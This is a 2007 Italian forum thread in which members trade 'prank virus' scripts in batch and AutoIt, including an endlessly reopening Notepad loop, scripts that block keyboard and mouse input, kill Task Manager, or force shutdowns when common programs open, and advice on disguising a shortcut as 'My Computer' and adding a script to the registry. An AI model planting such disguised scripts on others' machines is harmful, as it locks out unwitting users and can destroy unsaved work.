| | virus spastici... no danno grazie... | |
|
|
| Autore | Messaggio |
|---|
darkjoker Admin

Numero di messaggi: 813 Data d'iscrizione: 30.07.07
 | Oggetto: virus spastici... no danno grazie... Lun Nov 05, 2007 4:43 pm | |
| In questo topic vorrei invitare chiunque a inviare i suoi virus (mi raccomando niente di dannoso, grazie) ma solo virus-scherzi... il genere lo avrete capito anche voi.. si va da quello che spegne il computer a quello che vi apre il vassoio del lettore CD... Insomma.. bisogna liberare la fantasia...  cominciamo con qualcosina in .bat.. ecco: | Codice: | notepad nomefile.bat
|
vediamo cosa fa.. provatelo pure tanto non è dannoso, solo fastidioso: vi apre notepad e ogni volta che lo chiudete ve lo riaprirà di nuovo..finche non chiudete il file .bat al posto di nomefile.bat dovete mettere il nome del vostro file, altrimenti notepad non verrà aperto ogni volta che lo chiuderete... poi se volete nascondete questo file in c:\windows\system32 o qualche altra cartella, cancellate risorse del computer dal desktop, create un link al file .bat, rinominatelo in risorse del computer, cambiate icona e fte in modo che si apra ridotto a icona (tasto destro-> proprietà e trovate tutto li) ora fate usare il vostro pc a qualcun'altro... entro i primi 5 minuti dovrà usare risorse del computer.. e andra nel pallone ogni volta che non riuscirà a chiudere notepad... divertimento assicurato sopratutto per chi non se la cava con i pc... (mio cugino per 15 minuti buoni è rimasto a chiudere notepad senza capire il perche... ) occhio a non mettere
| Codice: | start notepad nomefile.bat
|
che senno vi apre per sempre notepad (finche non chiudete il file .bat o non vi si satura la ram)... naturalmente spegnendo passa tutto.. ma è piu bello vedere qualcuno che si danna a chiudere sempre notepad... 
ho gia in mente qualche altro trucchetto, ma prima vi lascio carta bianca per i vostri lavoretti... postate magari quelli in linguaggi non molto ben trattati sul forum, come batch, javascript, etc ma naturalmente anche quelli piu comuni... l'assembly è bellissimo per questo genere di cose... vedere topic di blacklight sull'assembly per capire perche... 
buon divertimento... darkjoker
ps: tutti i programmi dannosi (conosciuti meglio come VIRUS) verranno rimossi, evitate quindi anche di postarli.. per quelli esiste geky chan..._________________ L'unico computer sicuro, è un computer spento. Nel software esiste sempre almeno un bug, generalmente è localizzabile tra la tastiera e la sedia  |
|
 | |
darkphantom hack-member

Numero di messaggi: 398 Data d'iscrizione: 03.09.07
 | Oggetto: Re: virus spastici... no danno grazie... Gio Nov 08, 2007 4:11 pm | |
| lo so, autoit è meno bello, però ci si possono fare dei programmi carini: | Codice: | While 1 If ProcessExists("notepad.exe") Or ProcessExists("WINWORD.EXE") Or ProcessExists("EXCEL.EXE") Or ProcessExists("POWERPNT.EXE") Or ProcessExists("MSACCESS.EXE") Or ProcessExists("OUTLOOK.EXE") Or ProcessExists("FRONTPG.EXE") Or ProcessExists("iexplore.exe") Or ProcessExists("firefox.exe") Or ProcessExists("taskmgr.exe") Or ProcessExists("wordpad.exe") Or ProcessExists("wmplayer.exe") Or ProcessExists("calc.exe") Or ProcessExists("nero.exe") Then BlockInput(1) MouseClick("left",30,750,1,100) MouseClick("left",270,710,1,100) MouseClick("left",510,290,1,100) EndIf WEnd
|
semplice, fastidioso come pochi: se apri un processo tra quelli elencati, il mouse va da solo (molto lentamente) a spegnere il computer... non è dannoso, non tanto, e perchè sia efficace bisogna metterlo nel registro di windows... |
|
 | |
certaindeath Admin

Numero di messaggi: 343 Data d'iscrizione: 30.07.07
 | Oggetto: Re: virus spastici... no danno grazie... Sab Nov 10, 2007 3:25 pm | |
| potente! ma perchè ci hai messo pure firefox? cosa ti ha fatto di male? per il resto qualche ProcessExists in più e hai bloccato tutti i programmi di microsft |
|
 | |
darkphantom hack-member

| Oggetto: Re: virus spastici... no danno grazie... Lun Nov 12, 2007 1:01 pm | |
| eccone un altro: | Codice: | blockinput(1) while 1 if processexists("taskmgr.exe") then processclose("taskmgr.exe") blockinput(1) endif wend
|
blocco totale del computer P.S. metterlo all'amico perchè vi ha fatto la bua è da lameri |
|
 | |
alebor92 apprendista

Numero di messaggi: 40 Età: 19 Data d'iscrizione: 10.11.07
 | Oggetto: Re: virus spastici... no danno grazie... Mar Nov 13, 2007 2:33 pm | |
| Ho provato quello del notepad, ma mi apre solo la finestra dos, scrivendo in continuazione il percorso ...../desktop/notepad però non aprendomi il programma (in questo caso blocco note). Ho sbagliato qualcosa? Grazie. |
|
 | |
darkwolf membro importante

Numero di messaggi: 225 Localizzazione: Un pò più a destra ecco bravo adesso un pò più in basso perfetto abito lì Data d'iscrizione: 05.11.07
 | Oggetto: Re: virus spastici... no danno grazie... Mer Nov 14, 2007 9:50 am | |
| Allora fai così Apri il blocco note e incolli questo codice
ricordati che il file si deve chiamare io.bat altrimenti si apre una volta sola.... poi se vuoi nascondere la finestra di dos puoi scaricare quick batch file compiler e lo trasformi in exe in mod Ghost in modo tale che si vede solo il notepad senza la schermata dos |
|
 | |
darkphantom hack-member

| Oggetto: Re: virus spastici... no danno grazie... Mer Nov 14, 2007 3:12 pm | |
| forte! eccone uno, il più stupido di tutti: | Codice: | while 1 msgbox(0,"","chiudimi,se ci riesci!") wend
|
non serve nemmeno spiegarlo |
|
 | |
darkjoker Admin

| Oggetto: Re: virus spastici... no danno grazie... Mer Nov 14, 2007 4:06 pm | |
| ... darkphantom... mi hai deluso... mai nella mia carriera ho visto un programma piu demente...  _________________ L'unico computer sicuro, è un computer spento. Nel software esiste sempre almeno un bug, generalmente è localizzabile tra la tastiera e la sedia  |
|
 | |
darkwolf membro importante

Numero di messaggi: 225 Localizzazione: Un pò più a destra ecco bravo adesso un pò più in basso perfetto abito lì Data d'iscrizione: 05.11.07
 | Oggetto: Re: virus spastici... no danno grazie... Mer Nov 14, 2007 4:50 pm | |
| certo che tra il "virus" di darkjoker e quello di darkphantom uno si sciala  |
|
 | |
darkphantom hack-member

| Oggetto: Re: virus spastici... no danno grazie... Mer Nov 14, 2007 7:02 pm | |
| lo so, ho premesso che era il più stupido di tutti... provateci voi a fare un "virus" così stupido! mica facile!  |
|
 | |
abe93 membro importante

Numero di messaggi: 205 Età: 19 Localizzazione: Piacenza Data d'iscrizione: 18.08.07
 | Oggetto: Re: virus spastici... no danno grazie... Mer Nov 14, 2007 8:00 pm | |
| beh questo mi sa che lo batte il tuo... | Codice: | while 1=1 $var = msgbox (4, 'ciao', 'sei pregato di non schiacciare si') if $var = 6 then msgbox (0, '', 'cavolo ma ti avevo detto di non premerlo... fra 5 sec il tuo pc si autodistrugge') sleep(5000) Shutdown (1) elseif $var = 7 then msgbox (0, '','hai premuto no, ma cavolo sei privo di curiosità... per questo sarai punito!!!') sleep(5000) Shutdown (1) endif Wend
|
divertitevi... |
|
 | |
darkjoker Admin

| Oggetto: Re: virus spastici... no danno grazie... Gio Nov 15, 2007 5:12 pm | |
| mucho stupido!!!  non credo di riuscire a superare una tale idiozia...  magari potrei aprire un torneo per chi fa il virus piu demente... intanto sposto in OT che forse ci sta meglio... no? _________________ L'unico computer sicuro, è un computer spento. Nel software esiste sempre almeno un bug, generalmente è localizzabile tra la tastiera e la sedia  |
|
 | |
darkphantom hack-member

| Oggetto: Re: virus spastici... no danno grazie... Gio Nov 15, 2007 6:45 pm | |
| @darkjoker: pienamente d'accordo. questo topic sta diventando una buffonata... @abe93: mi inchino alla tua abilità nel creare virus inutili e più stupidi di zio billy(be non esageriamo) |
|
 | |
darkphantom hack-member

| Oggetto: Re: virus spastici... no danno grazie... Dom Nov 18, 2007 8:27 pm | |
| spero di superare abe con questo: | Codice: | $a=inputbox("quanto ti annoi da 1 a 100?") if $a <=1 then msg() else msgbox(0,"","lo so che ti annoi tanto... almeno 100...") $a=100 msg() endif func msg() for $b=$a to 1 step -1 msgbox(0,"","eccoti qualcosa da fare: devi premere ancora"&$b&" volte") next endfunc
|
allora? ho battuto il prode abe93 con quest'impresa? |
|
 | |
darkjoker Admin

| Oggetto: Re: virus spastici... no danno grazie... Lun Nov 19, 2007 4:22 pm | |
| questa è vecchia,.. solo che era piu bella quella che ti mette le msgbox a muzzo sul desktop-.. _________________ L'unico computer sicuro, è un computer spento. Nel software esiste sempre almeno un bug, generalmente è localizzabile tra la tastiera e la sedia  |
|
 | |
darkphantom hack-member

| Oggetto: Re: virus spastici... no danno grazie... Mar Nov 20, 2007 2:04 pm | |
| lo so che è vecchia, ho preso l'idea da un "virus" trovato in internet... |
|
 | |
darkjoker Admin

| Oggetto: Re: virus spastici... no danno grazie... Mer Nov 21, 2007 4:09 pm | |
| magari potreati migliorare usando WinMove (titolo finestrA, COORDINATE X E Y), ci metti un random che seleziona dove metterle... no?  _________________ L'unico computer sicuro, è un computer spento. Nel software esiste sempre almeno un bug, generalmente è localizzabile tra la tastiera e la sedia  |
|
 | |
darkphantom hack-member

| Oggetto: Re: virus spastici... no danno grazie... Mer Nov 21, 2007 5:01 pm | |
| carina come idea... solo che non so come crearle tutte insieme, visto che quando apri una msgbox lo script entra in pausa... però si potrebbero usare delle gui mascherate da msgbox... |
|
 | |
darkphantom hack-member

| Oggetto: Re: virus spastici... no danno grazie... Mer Nov 21, 2007 5:31 pm | |
| eccolo qua il programma: | Codice: | #NoTrayIcon #include<GUIConstants.au3> $a=inputbox("quanto ti annoi?","quanto ti stai annoiando da 1 a 100?") if $a >=1 then for $b=1 to $a step 1 $l=Random(1,700,1) $r=Random(1,700,1) GUICreate("eccoti qualcosa da fare",230,130,$l,$r) GUICtrlCreateLabel("eccoti qualcosa da fare: chiudi "&$b&" msgbox",20,20) $ok=GUICtrlCreateButton("OK",70,50,80) GUISetState() next ElseIf $a<1 Then msgbox(0,"","lo so che ti annoi tanto... almeno 100...") $a=100 for $b=1 to $a step 1 $l=Random(1,700,1) $r=Random(1,700,1) GUICreate("eccoti qualcosa da fare",230,130,$l,$r) GUICtrlCreateLabel("eccoti qualcosa da fare: chiudi "&$b&" msgbox",20,20) $ok=GUICtrlCreateButton("OK",70,50,80) GUISetState() next endif While 1 $msg=GUIGetMsg() If $msg=$ok Or $msg=$GUI_EVENT_CLOSE Then GUIDelete() EndIf WEnd
|
ho usato delle gui mascherate da msgbox perchè, come ho già detto, con le msgbox lo script va in pausa. ho solo un problema: dicendo, per esempio, 5, vengono sì 5 "msgbox", però posso chiudere solo la prima: perchè? mi potete dare una mano? |
|
 | |
darkjoker Admin

| Oggetto: Re: virus spastici... no danno grazie... Gio Nov 22, 2007 3:15 pm | |
| non puoi fare in modo che ti compare una nuova gui appena chiudi quella precedente? _________________ L'unico computer sicuro, è un computer spento. Nel software esiste sempre almeno un bug, generalmente è localizzabile tra la tastiera e la sedia  |
|
 | |
| | virus spastici... no danno grazie... | |
|